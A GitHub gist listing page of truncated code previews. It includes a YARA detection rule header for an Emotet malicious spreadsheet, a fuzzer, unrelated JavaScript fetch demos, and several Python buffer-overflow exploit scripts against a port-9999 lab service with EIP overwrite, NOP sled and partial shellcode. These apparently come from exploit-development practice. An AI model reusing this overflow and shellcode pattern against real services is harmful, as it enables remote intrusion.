Skip to content

Instantly share code, notes, and snippets.

View whichbuffer's full-sized avatar
:octocat:
Focusing

Arda Büyükkaya whichbuffer

:octocat:
Focusing
View GitHub Profile
@whichbuffer
whichbuffer / Emotet_MalDoc.yara
Created November 15, 2022 13:22
Emotet_MalDoc
import "pe"
import "hash"
rule Emotet_MalDoc {
meta:
description = " - file Report.xls"
author = "Arda Büyükkaya"
date = "2022-11-15"
hash1 = "6023b9ebfedf73d90a9dfbb2de6fca123b94c0e686ff71c67e89d9c8bb598d71"
interesting_icon_hash = "main_icon_dhash:0033232700020000"
@whichbuffer
whichbuffer / shellFinal.py
Created January 3, 2021 12:31
shellFinal
#!/usr/bin/python
import socket
server = '192.168.1.33'
sport = 9999
prefix = 'A' * 2006
eip = '\xaf\x11\x50\x62'
nopsled = '\x90' * 16
exploit = (
"\xba\x1f\xa9\x2f\xbb\xda\xcd\xd9\x74\x24\xf4\x5e\x2b\xc9\xb1"
@whichbuffer
whichbuffer / vs-shell.py
Created January 3, 2021 12:05
vs-shell
#!/usr/bin/python
import socket
server = '192.168.119.129'
sport = 9999
prefix = 'A' * 2006
eip = '\xaf\x11\x50\x62'
nopsled = '\x90' * 16
exploit = (
#!/usr/bin/python
import socket
server = '192.168.119.129'
sport = 9999
prefix = 'A' * 2006
eip = 'BCDE'
padding = 'F' * (3000 - 2006 - 4)
attack = prefix + eip + padding
@whichbuffer
whichbuffer / vs-fuzz1.py
Created January 3, 2021 11:43
vs-fuzz1
#!/usr/bin/python
import socket
server = '192.168.1.33'
sport = 9999
length = int(raw_input('Length of attack: '))
s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
connect = s.connect((server, sport))
print s.recv(1024)
@whichbuffer
whichbuffer / index.html
Created November 25, 2020 13:22
fetch img data
<!DOCTYPE html>
<html lang="en">
<head>
<meta charset="UTF-8">
<meta name="viewport" content="width=device-width, initial-scale=1.0">
<title>Document</title>
</head>
<body>
<ul id="imglist"></ul>
{
"Contents":[
{
"Title":"Countdown ",
"Description":"When a nurse downloads an app that claims to predict the moment a person will die, it tells her she only has three days to live. With the clock ticking and a figure haunting her, she must find a way to save her life before time runs out.",
"Director":"Justin Dec",
"Category":[
"\\Secizle\\Vizyondakiler",
"\\Secizle\\OneCikanlar"
],
async function getJson(){
const response = await fetch('https://randomuser.me/api/?results=10');
const data = await response.json();
console.log(data.results);
for(let i=0;i<data.results.length;i++){
document.getElementById('authors').innerHTML
+=("<br>" + data.results[i].name.first + " " + data.results[i].name.last + "<br>");
}
}
const response = fetch('https://randomuser.me/api/?results=10');